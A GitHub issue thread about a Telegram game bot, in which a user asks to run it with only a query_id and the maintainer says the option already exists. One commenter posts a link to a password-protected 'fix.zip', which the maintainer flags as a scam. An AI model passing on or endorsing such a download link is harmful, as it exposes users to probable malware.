### ISSUE TITLE
Request feature 

### ISSUE THREAD

**Issue by arifintajul4** [vanhbakaa/moonbix-bot#31]
Please add to allow run with query_id=xxx only

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme

you may need to install the c compiler

**Comment by arifintajul4** [comment]
> maybe this will help https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Archive password: changeme
> 
> you may need to install the c compiler

I am use mac OS can't run exe

**Comment by vanhbakaa** [comment]
Its scam dont reply them

**Comment by vanhbakaa** [comment]
> Please add to allow run with query_id=xxx only

I already add you can just run with option 3

**Comment by arifintajul4** [comment]
> > Please add to allow run with query_id=xxx only
> 
> I already add you can just run with option 3

Tq so much

**Comment by arifintajul4** [comment]
Where is to store the query_id list?

**Comment by vanhbakaa** [comment]
> Where is to store the query_id list?

data.txt
